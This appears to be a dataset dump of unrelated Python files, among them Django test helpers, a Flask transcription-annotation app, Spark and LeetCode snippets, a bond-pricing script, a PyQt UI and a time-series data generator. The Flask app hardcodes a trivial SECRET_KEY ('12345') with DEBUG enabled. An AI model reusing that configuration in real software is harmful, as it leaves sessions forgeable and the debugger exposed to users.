+{"seq_id":"602447293","text":"from django.test import TestCase\n\nfrom .models import *\n\n\n# Create your tests here.\n\ndef create_test_card(fields: dict = {}):\n card = Card()\n card.name = 'undefined'\n card.cmc = 0\n card.num_power = 0\n card.num_toughness = 0\n card.num_loyalty = 0\n card.colour_count = 0\n card.colour_sort_key = 0\n card.colour_weight = 0\n card.is_reserved = False\n\n for key, value in fields.items():\n card.__dict__[key] = value\n\n card.save()\n return card\n\n\ndef create_test_card_printing(card: Card, set_obj: Set, fields: dict = {}):\n printing = CardPrinting()\n printing.card = card\n printing.set = set_obj\n printing.collector_number = 0\n printing.rarity = create_test_rarity('Common', 'C')\n printing.is_starter = False\n\n for key, value in fields.items():\n printing.__dict__[key] = value\n\n printing.save()\n return printing\n\n\ndef create_test_set(name: str, setcode: str, fields: dict = {}):\n set_obj = Set(name=name, code=setcode)\n\n for key, value in fields.items():\n set_obj.__dict__[key] = value\n\n set_obj.save()\n\n return set_obj\n\n\ndef create_test_rarity(name: str, symbol: str):\n rarity = Rarity(name=str, symbol=symbol)\n rarity.display_order = 1\n rarity.save()\n return rarity\n","sub_path":"sylvan_library/cards/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178096392","text":"import os\nimport gevent\nfrom flask import Flask, flash, request, jsonify, render_template, redirect, url_for\nfrom flask.ext.socketio import SocketIO\nfrom flask.ext.login import LoginManager, login_user, logout_user, login_required, current_user\nfrom flask.ext.googlelogin import GoogleLogin\nfrom lib import create_recordings_saver, create_db_connection, RecordingsModel, UsersModel\n\n\napp = Flask(__name__)\napp.config.update(\n SECRET_KEY = '12345',\n DEBUG = True,\n GOOGLE_LOGIN_CLIENT_ID = os.environ['GOOGLE_LOGIN_CLIENT_ID'],\n GOOGLE_LOGIN_CLIENT_SECRET = os.environ['GOOGLE_LOGIN_CLIENT_SECRET'],\n GOOGLE_LOGIN_SCOPES = 'https://www.googleapis.com/auth/userinfo.email',\n)\n\nsocketio = SocketIO(app)\nlogin_manager = LoginManager(app)\ngoogle_login = GoogleLogin(app, login_manager)\n\ndb = create_db_connection(os.environ['CONNECTION_STRING'])\nusers_model = UsersModel(db)\nrecordings_model = RecordingsModel(\"/opt/app/static/data\", db)\nsaver = create_recordings_saver(\"tcp://0.0.0.0:5682\", \"/opt/app/static/data\", recordings_model)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', models=recordings_model.get_models())\n\n@app.route('/recordings/')\ndef recordings(model_name):\n return render_template('recordings.html', recordings=recordings_model.get_recordings(model_name), model_name=model_name)\n\n@app.route('/transcribe')\n@app.route('/transcribe/')\ndef transcribe(id = None):\n if id is None:\n recording = recordings_model.get_random_recording()\n else:\n recording = recordings_model.get_recording(id)\n\n return render_template('transcribe.html', recording=recording)\n\n@app.route('/transcriptions/')\ndef transcriptions(id):\n return render_template('transcriptions.html', recording=recordings_model.get_recording(id))\n\n@app.route('/save-transcription', methods=['POST'])\ndef save_transcription():\n flash('Recording was successfully transcribed')\n\n recordings_model.add_transcription(\n current_user,\n request.form['id'],\n request.form['transcription'],\n 'native_speaker' in request.form,\n 'offensive_language' in request.form,\n 'not_a_speech' in request.form\n )\n\n return redirect(url_for('recordings', model_name=request.form['model']))\n\n@app.route('/crowdflower/')\ndef crowdflower(model_name):\n return render_template('crowdflower.html', model_name=model_name)\n\n@app.route('/crowdflower_export/')\ndef crowdflower_export(model_name):\n return \"Not implemented yet!\"\n\n@app.route('/login/google')\n@google_login.oauth2callback\ndef login_google(token, userinfo, **params):\n login_user(users_model.upsert_user(userinfo))\n return redirect(url_for('index'))\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n@app.context_processor\ndef inject_google_login_url():\n return dict(\n google_login_url = google_login.login_url(redirect_uri=url_for('login_google', _external=True)),\n logout_url = url_for('logout')\n )\n\n@login_manager.user_loader\ndef load_user(id):\n return users_model.get_user(id)\n\n\nif __name__ == \"__main__\":\n from gevent import monkey\n monkey.patch_all()\n\n gevent.spawn(saver.run)\n socketio.run(app, host=\"0.0.0.0\", port=80)\n","sub_path":"cloudasr/annotation_interface/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308765602","text":"\n\nfrom xai.brain.wordbase.nouns._frier import _FRIER\n\n#calss header\nclass _FRIERS(_FRIER, ):\n\tdef __init__(self,): \n\t\t_FRIER.__init__(self)\n\t\tself.name = \"FRIERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"frier\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_friers.py","file_name":"_friers.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"416097178","text":"from pyspark import SparkConf, SparkContext\n\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"My App\")\nsc = SparkContext(conf=conf)\n\nnum = sc.parallelize(list(range(25)))\n\nsumCount = num.aggregate((0, 0),\n (lambda acc, value: (acc[0] + value, acc[1] + 1),\n (lambda acc1, acc2: (acc1[0] + acc2[0], acc1[1] + acc2[1]))))\n\nprint(sumCount[0] / float(sumCount[1]))\n","sub_path":"py/practice/spark/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"167242604","text":"import time\n\ndef run_pipeline(p, sleep_time):\n\tprint(p)\n\tfor f in p:\n\t\tprint(f)\n\t\tif f():\n\t\t\tprint('true')\n\t\t\ttime.sleep(sleep_time)\n\t\telse:\n\t\t\traise RuntimeError\n\treturn True\n\nclass BooleanExecutionPipeline:\n\n\tdef __init__(self, func_list, except_list=[], sleep_time=0):\n\t\tself.func_list = func_list\n\t\tself.except_list = except_list\n\t\tself.sleep_time = sleep_time\n\n\n\tdef execute(self):\n\t\ttry:\n\t\t\treturn run_pipeline(self.func_list, self.sleep_time)\n\t\texcept RuntimeError:\n\t\t\treturn run_pipeline(self.except_list, self.sleep_time)\n","sub_path":"boolean_execution_pipeline.py","file_name":"boolean_execution_pipeline.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"221979560","text":"class Solution:\n def uncommonFromSentences(self, A: str, B: str) -> List[str]:\n A=A.split(' ')\n B=B.split(' ')\n C = set(A+B)\n result = []\n for i in C:\n if (A.count(i)==1 and B.count(i) ==0) or (A.count(i)==0 and B.count(i) ==1) :\n result.append(i)\n return result\nclass Solution:\n def isMonotonic(self, A: List[int]) -> bool:\n n = len(A)\n t = 1\n if max(A) == A[0]:\n for i in range(n-1):\n if A[i] >= A[i+1]:\n t *=1\n else:\n t *=0\n elif min(A) == A[0]:\n for i in range(n-1):\n if A[i+1] >= A[i]:\n t *=1\n else:\n t *=0\n else:\n t *=0\n return bool(t)\n","sub_path":"LX_leetcode/第16天 .py","file_name":"第16天 .py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"103503411","text":"\"\"\"testframe URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nurlpatterns = [\n path('', include('main.urls')),\n path('main/', include('main.urls')),\n path('dashboard/', include('dashboard.urls')),\n path('projects/', include('projects.urls')),\n path('reports/', include('reports.urls')),\n path('requirements/', include('requirements.urls')),\n path('tcases/', include('tcases.urls')),\n path('tplans/', include('tplans.urls')),\n path('admin/', admin.site.urls),\n]\n","sub_path":"testframe/testframe/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406539561","text":"from Tool.downloadinfo import DownLoadInfo\nfrom Tool.functions import Functions\nfrom Tool.loadinfo import LoadInfo\nfrom Tool.plot import Plot\nfrom scipy.optimize import minimize_scalar\nimport numpy as np\n\n\ndef DownLoadData(date):\n DLI=DownLoadInfo(date)\n DLI.DownloadCOC()\n DLI.DownloadCurve()\n\ndef LoadData(date):\n LI=LoadInfo(date)\n LI.CorporateCurve()\n LI.GovernmentCurve()\n return LI\n\ndef CubicSplineInterpolation_YC_tw(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n PL=Plot()\n PL.DrawCubicSpline(FC.time_len,FC.YC_tw_value)\n\ndef TableofCreditSpread(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n FC.CreditSpread()\n print(FC.df_Cr_Spread)\n\ndef MSEminimization_LambdaEstimation(LI,Setting): \n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n FC.CreditSpread()\n FC.LambdaEstimation()\n result = minimize_scalar(FC.loss_func)\n est_lambda = result.x\n print('Default Probablity List :', FC.PD)\n print('Estimated Lambda :', est_lambda)\n print('Estimated Default Probability:', 1 - np.exp(-float(est_lambda)))\n\ndef Get_dr_prob(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n FC.CubicSplineInterpolation()\n FC.CreditSpread()\n FC.LambdaEstimation()\n result = minimize_scalar(FC.loss_func)\n est_lambda = result.x\n dr_prob = 1 - np.exp(-float(est_lambda)*dt)\n return dr_prob\n\ndef YCDF(LI):\n LI.HullMonteCarlo()\n print(LI.YCDF) \n\ndef ThetaApproximation(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr)\n PL=Plot()\n PL.DrawThetaApproximation(THETA) \n\ndef HullWhiteShortRateSimulation(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr)\n FC.InterestRatePath(Init_Rate,rv_spd,THETA,vol,timesteps)\n print('Interest Rate Path Shape : ', FC.paths.shape)\n PL=Plot()\n PL.DrawHullWhite(FC.paths)\n\ndef ImplementingLSM(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr) \n FC.InterestRatePath(Init_Rate,rv_spd,THETA,vol,timesteps)\n FC.Decision()\n PL=Plot()\n PL.DrawDiscountPath(FC.full_disc(0.0,Get_dr_prob(LI,Setting)))\n\ndef SolutionForLiquidityFactor(LI,Setting):\n FC=Functions(LI.YC_tw,LI.COC_twAA,Setting)\n LI.HullMonteCarlo()\n THETA , coef = FC.YTM_fit(LI.YCDF['Interest Rate'],LI.YCDF['MT_dt'],rv_spd,vol,yr_length,days_per_yr) \n FC.InterestRatePath(Init_Rate,rv_spd,THETA,vol,timesteps)\n FC.Decision()\n PL=Plot()\n est_lq_sprd=FC.EstimatedLiquidity(Get_dr_prob(LI,Setting))\n PL.DrawDiscountPath(FC.full_disc(est_lq_sprd,Get_dr_prob(LI,Setting)))\n\n\n# #### Settings - 1\nnum_paths = 2000\nyr_length = 30\ndays_per_yr = 360\ntimesteps = days_per_yr * yr_length\ndt = 1 / days_per_yr # Time Step \n\n### LGD=50% \nLGD = 0.5\n\nFace_Val = 1000\nRedempt_Price = 1000 \ncoupon = [ 0, Face_Val*0.0345, Face_Val*0.0445] \n\n# Default LAMBDA\nreco_rate = 0.5 # Recovery Rate\n\n## Initial Setting for Rate Simulation\nInit_Rate = 0.026 # 基準利率\nrv_spd = 0.05\nvol = 0.025\n\n\nSetting={'num_paths':num_paths, 'timesteps':timesteps, 'Face_Val':Face_Val, 'days_per_yr':days_per_yr, \n'dt':dt, 'reco_rate':reco_rate, 'Redempt_Price':Redempt_Price, 'coupon':coupon,'LGD':LGD}\n\n\n\n\n#print(LoadData('20170623').COC_twAA)\n#print(LoadData('20170622').COC_twAA)\n#print(LoadData('20170623').YC_tw)\n#print(LoadData('20170622').YC_tw)\n\nDownLoadData('20170623')\nLD=LoadData('20170623')\n\n\nCubicSplineInterpolation_YC_tw(LD,Setting)\nTableofCreditSpread(LD,Setting)\nMSEminimization_LambdaEstimation(LD,Setting)\nYCDF(LD)\nThetaApproximation(LD,Setting)\nHullWhiteShortRateSimulation(LD,Setting)\nImplementingLSM(LD,Setting)\nSolutionForLiquidityFactor(LD,Setting)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"IDE_Ver/PCBond-Pricing.py","file_name":"PCBond-Pricing.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"653992853","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom testsimulatorWindow import*\n\n\n\nclass Ui_MainWindow(object):\n\n def __init__(self):\n super().__init__()\n self.n = 0 # n for number of processes\n self.option = 0 # option for selection of algo\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(800, 600)\n MainWindow.setAutoFillBackground(False)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.backgroundImage = QtWidgets.QLabel(self.centralwidget)\n self.backgroundImage.setGeometry(QtCore.QRect(0, 0, 801, 581))\n self.backgroundImage.setText(\"\")\n self.backgroundImage.setPixmap(QtGui.QPixmap(\"main_background.jpg\"))\n self.backgroundImage.setScaledContents(True)\n self.backgroundImage.setObjectName(\"backgroundImage\")\n\n #for label1\n\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(290, 40, 471, 101))\n font = QtGui.QFont()\n font.setFamily(\"Rockwell Extra Bold\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"color : #fff;\\n\"\n\"font-size : 42px;\\n\"\n\"}\")\n self.label.setObjectName(\"label\")\n\n #for label2\n\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(450, 120, 411, 41))\n font = QtGui.QFont()\n font.setFamily(\"Rockwell Extra Bold\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setWeight(75)\n self.label_2.setFont(font)\n self.label_2.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"\\n\"\n\"font-size : 24px;\\n\"\n\"color : rgb(255, 85, 6);\\n\"\n\"}\")\n self.label_2.setObjectName(\"label_2\")\n\n #frame \n \n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(350, 220, 411, 221))\n self.frame.setStyleSheet(\"QFrame\\n\"\n\"{\\n\"\n\"\\n\"\n\"border: 4px dashed #fff;\\n\"\n\"\\n\"\n\"}\")\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n\n #label3\n\n self.label_3 = QtWidgets.QLabel(self.frame)\n self.label_3.setGeometry(QtCore.QRect(20, 50, 171, 51))\n self.label_3.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"border : none;\\n\"\n\"color : #fff;\\n\"\n\"font-size : 22px;\\n\"\n\"}\")\n self.label_3.setObjectName(\"label_3\")\n \n #label3\n\n self.label_4 = QtWidgets.QLabel(self.frame)\n self.label_4.setGeometry(QtCore.QRect(20, 120, 161, 41))\n self.label_4.setStyleSheet(\"QLabel\\n\"\n\"{\\n\"\n\"border : none;\\n\"\n\"color : #fff;\\n\"\n\"font-size : 22px;\\n\"\n\"}\")\n self.label_4.setObjectName(\"label_4\")\n \n #comboBox\n\n self.comboBox = QtWidgets.QComboBox(self.frame)\n self.comboBox.setGeometry(QtCore.QRect(220, 120, 161, 41))\n self.comboBox.setStyleSheet(\"QComboBox\\n\"\n\"{\\n\"\n\"background-color : #fff;\\n\"\n\"font-size : 18px;\\n\"\n\"}\")\n self.comboBox.setObjectName(\"comboBox\")\n icon = QtGui.QIcon.fromTheme(\"none\")\n self.comboBox.addItem(icon, \"\")\n self.comboBox.setItemText(0, \"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n self.comboBox.addItem(\"\")\n\n #lineEdit\n\n self.lineEdit = QtWidgets.QLineEdit(self.frame)\n font = QtGui.QFont()\n font.setFamily(\"Source Sans Pro Black\")\n font.setPointSize(12)\n font.setBold(True)\n font.setItalic(False)\n font.setWeight(75)\n self.lineEdit.setFont(font)\n self.lineEdit.setStyleSheet(\"QLineEdit\\n\"\n\"{\\n\"\n\"padding : 1px 2px 2px 2px;\\n\"\n\"}\")\n self.lineEdit.setGeometry(QtCore.QRect(220, 60, 161, 41))\n self.lineEdit.setObjectName(\"lineEdit\")\n\n self.start = QtWidgets.QPushButton(self.centralwidget)\n self.start.setGeometry(QtCore.QRect(500, 460, 131, 51))\n font = QtGui.QFont()\n font.setFamily(\"Nueva Std\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setWeight(75)\n self.start.setFont(font)\n self.start.setStyleSheet(\"QPushButton\\n\"\n\"{\\n\"\n\" background-color: rgb(255, 16, 80);\\n\"\n\" border-radius : 2px;\\n\"\n\" color: white;\\n\"\n\" padding: 15px 28px;\\n\"\n\" text-align: center;\\n\"\n\" font-size: 24px;\\n\"\n\"}\\n\"\n\"\")\n self.onlyInt = QtGui.QIntValidator(1,10)\n self.lineEdit.setValidator(self.onlyInt) #validations for number of processes\n\n self.start.setObjectName(\"start\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.start.clicked.connect(self.getNum) #connecting to getN \n if (self.getNum): self.start.clicked.connect(self.getAlgo) #connecting to getAlgo\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Simulator\"))\n self.label.setText(_translate(\"MainWindow\", \"CPU - SCHEDULING\"))\n self.label_2.setText(_translate(\"MainWindow\", \"SIMULATION PROGRAM\"))\n self.label_3.setText(_translate(\"MainWindow\", \"No of Process : \"))\n self.label_4.setText(_translate(\"MainWindow\", \"Algorithm :\"))\n self.comboBox.setStatusTip(_translate(\"MainWindow\", \" Select the Scheduling Algorithm\"))\n self.comboBox.setItemText(1, _translate(\"MainWindow\", \"FCFS\"))\n self.comboBox.setItemText(2, _translate(\"MainWindow\", \"RR\"))\n self.comboBox.setItemText(3, _translate(\"MainWindow\", \"Priority-np\"))\n self.comboBox.setItemText(4, _translate(\"MainWindow\", \"Priority-p\"))\n self.comboBox.setItemText(5, _translate(\"MainWindow\", \"SJF\"))\n self.comboBox.setItemText(6, _translate(\"MainWindow\", \"SRTF\"))\n self.start.setText(_translate(\"MainWindow\", \"Start\"))\n\n def getNum(self):\n if self.lineEdit.text() == \"\":\n error = \"input no of process !\"\n self.showError(error)\n return False\n else : \n self.n = int(self.lineEdit.text()) \n return True\n \n \n \n def getAlgo(self):\n if self.comboBox.currentText() == \"\":\n error = \"Select the Algorithm !\"\n self.showError(error)\n else : \n txt = self.comboBox.currentText()\n if txt == \"FCFS\": self.option = 0\n if txt == \"RR\": self.option = 1\n if txt == \"Priority-np\": self.option = 2\n if txt == \"Priority-p\": self.option = 3\n if txt == \"SJF\": self.option = 4\n if txt == \"SRTF\": self.option = 5\n self.openSimulator()\n\n def showError(self,error):\n msg = QMessageBox()\n msg.setWindowTitle(\"Error\")\n msg.setText(error)\n font = QtGui.QFont()\n font.setFamily(\"Nueva Std\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setWeight(75)\n msg.setFont(font)\n msg.setIcon(QMessageBox.Critical)\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msg.setStyleSheet('QLabel{margin : 10px;}\\n QLabel {font-size: 22px;}')\n msg.exec_()\n\n\n\n def openSimulator(self): #calling the second window\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_MainWindow1()\n self.ui.n = self.n # setting the n and option variables of simulator window\n self.ui.option = self.option\n self.ui.setupUi(self.window)\n self.window.show()\n \n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","sub_path":"testmainWindow.py","file_name":"testmainWindow.py","file_ext":"py","file_size_in_byte":8487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"390604957","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport numpy as np\nimport os\nimport pandas as pd\n\n\ndef generate_graph_seq2seq_io_data(\n df, x_offsets, y_offsets, daily_trend,add_time_in_day=True,\n):\n \"\"\"\n Generate samples from\n :param df:\n :param x_offsets:\n :param y_offsets:\n :param add_time_in_day:\n :param add_day_in_week:\n :param scaler:\n :return:\n # x: (epoch_size, input_length, num_nodes, input_dim)\n # y: (epoch_size, output_length, num_nodes, output_dim)\n \"\"\"\n\n num_samples, num_nodes = df.shape #(num_samples, num_nodes)\n time_ind = [i % trend_size for i in range(len(df))]\n time_ind = np.array(time_ind)\n print('daily_trend shape',daily_trend.shape)\n data = np.expand_dims(df, axis=-1)\n data_list = [data]\n if add_time_in_day:\n time_in_day = np.tile(time_ind, [1, num_nodes, 1]).transpose((2, 1, 0))\n data_list.append(time_in_day)\n\n\n data = np.concatenate(data_list, axis=-1)\n # epoch_len = num_samples + min(x_offsets) - max(y_offsets)\n x, y ,y_trend = [], [], []\n # t is the index of the last observation.\n min_t = abs(min(x_offsets))\n max_t = abs(num_samples - abs(max(y_offsets))) # Exclusive\n for t in range(min_t, max_t):\n x_t = data[t + x_offsets, ...]\n y_t = data[t + y_offsets, ...]\n y_trend_t = daily_trend[time_ind[t + y_offsets],...]\n x.append(x_t)\n y.append(y_t)\n y_trend.append(y_trend_t)\n x = np.stack(x, axis=0)\n y = np.stack(y, axis=0)\n y_trend = np.stack(y_trend, axis=0)\n return x, y, y_trend\n\ndef calculate_daily_trend(df,train_percent,trend_size):\n df = df[0:round(len(df)*train_percent),:] #只使用训练集的数据计算trend\n time_ind = [i % trend_size for i in range(len(df))]\n time_ind = np.array(time_ind)\n # print('time_ind',time_ind)\n\n trend_list = []\n for ind in range(trend_size):\n mean_timeind = np.array(df[np.where(time_ind == ind)].mean(axis=0))\n trend_list.append(mean_timeind)\n\n daily_trend = np.stack(trend_list,axis=0)\n\n return daily_trend\n\n\ndef generate_train_val_test(args,input_len,output_len,trend_size):\n\n\n df = np.loadtxt(args.filename, delimiter=',')\n\n if 'electricity' in args.filename or 'solar' in args.filename:\n print('data_rescaled')\n max_data = df.max(axis=0)\n min_data = df.min(axis=0)\n df = (df-min_data)/(max_data-min_data)\n\n train_percent = 0.6\n test_percent = 0.2\n\n # 0 is the latest observed sample.\n x_offsets = np.sort(\n np.concatenate((np.arange(-input_len+1, 1, 1),))\n )\n # Predict the next one hour\n y_offsets = np.sort(np.arange(1, output_len+1, 1))\n\n #calculate the daily_trends\n daily_trend = calculate_daily_trend(df,train_percent,trend_size)\n\n # x: (num_samples, input_length, num_nodes, input_dim)\n # y: (num_samples, output_length, num_nodes, output_dim)\n x, y, y_trend = generate_graph_seq2seq_io_data(\n df,\n x_offsets=x_offsets,\n y_offsets=y_offsets,\n daily_trend = daily_trend,\n add_time_in_day=True,\n )\n\n print(\"x shape: \", x.shape, \", y shape: \", y.shape, \", y_trend shape\", y_trend.shape)\n\n num_samples = x.shape[0]\n num_test = round(num_samples * test_percent)\n num_train = round(num_samples * train_percent)\n num_val = num_samples - num_test - num_train\n\n # train\n x_train, y_train, ytrend_train = x[:num_train], y[:num_train], y_trend[:num_train]\n # val\n x_val, y_val, ytrend_val = (\n x[num_train: num_train + num_val],\n y[num_train: num_train + num_val],\n y_trend[num_train: num_train + num_val],\n )\n # test\n x_test, y_test, ytrend_test = x[-num_test:], y[-num_test:], y_trend[-num_test:]\n\n for cat in [\"train\", \"val\", \"test\"]:\n _x, _y, _ytrend = locals()[\"x_\" + cat], locals()[\"y_\" + cat], locals()[\"ytrend_\" + cat]\n print(cat, \"x: \", _x.shape, \"y:\", _y.shape, \"ytrend:\", _ytrend.shape)\n np.savez_compressed(\n os.path.join(args.output_dir, \"%s.npz\" % cat),\n x=_x,\n y=_y,\n ytrend=_ytrend,\n x_offsets=x_offsets.reshape(list(x_offsets.shape) + [1]),\n y_offsets=y_offsets.reshape(list(y_offsets.shape) + [1]),\n )\n\n return df,daily_trend\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--output_dir\", type=str, default=\"../data/electricity/\", help=\"Output directory.\"\n )\n parser.add_argument(\n \"--filename\",\n type=str,\n default=\"../data/electricity\",\n help=\"Raw data readings.\",\n )\n args = parser.parse_args()\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n input_len = 24\n output_len = 12\n trend_size = 7\n\n print(\"Generating training data\")\n generate_train_val_test(args,input_len,output_len,trend_size)\n","sub_path":"generate_txt_data.py","file_name":"generate_txt_data.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"541085846","text":"__author__ = 'ThomasRiley'\r\n\r\nwith open('input.txt') as f:\r\n testCases = f.readlines()\r\n n = testCases[0]\r\n for i in range(1, int(n)+1):\r\n s = set()\r\n num = (int(testCases[i]))\r\n done = False\r\n x = 1\r\n while not done:\r\n if num == 0:\r\n print('Case #'+str(i)+': INSOMNIA')\r\n done = True\r\n #if str(num) not in s:\r\n # s.add(str(num))\r\n for c in str(num*x):\r\n s.add(c)\r\n\r\n if len(s) == 10:\r\n print('Case #'+str(i)+': '+str(num*x))\r\n done = True\r\n x += 1","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Gnarlywhale_countinsheep.py","file_name":"16_0_1_Gnarlywhale_countinsheep.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"211553655","text":"# 8. Given a string, compute recursively a new string where all the 'x' chars have been removed.\ndef remove(n):\n if len(n) <= 1:\n if n == 'x' :\n return ''\n else:\n return n\n\n else:\n if n[0] == 'x' :\n return '' + remove(n[1:])\n else:\n return n[0] + remove(n[1:])\n\nprint(remove('lxxxxxxoxxxxxl'))\n","sub_path":"week-04/day-04/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"53738056","text":"# -*- coding : utf-8 -*-\r\n\r\n'''\r\nGiven a binary tree, find its maximum depth.\r\n\r\nThe maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\r\n'''\r\n\r\n# Definition for a binary tree node.\r\nclass TreeNode(object):\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\nclass Solution(object):\r\n def maxDepth(self, root):\r\n \"\"\"\r\n :type root: TreeNode\r\n :rtype: int\r\n \"\"\"\r\n return 0 if not root else 1 + max(self.maxDepth(root.left), self.maxDepth(root.right))\r\n \r\n # if not root:\r\n # return 0 \r\n # left_num = self.maxDepth(root.left) + 1\r\n # right_num = self.maxDepth(root.right) + 1\r\n # return max(left_num, right_num)\r\n \r\n \r\nif __name__ == '__main__':\r\n root = temp = TreeNode(0)\r\n temp.left = left = TreeNode(0)\r\n temp.right = right = TreeNode(0)\r\n left.left = left = TreeNode(0)\r\n so = Solution()\r\n print(so.maxDepth(root))","sub_path":"104. Maximum-Depth-of Binary-Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
